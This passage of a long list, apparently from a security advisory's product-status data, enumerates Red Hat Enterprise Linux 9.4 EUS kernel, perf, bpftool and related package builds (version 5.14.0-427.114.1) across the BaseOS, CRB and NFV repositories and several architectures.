"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
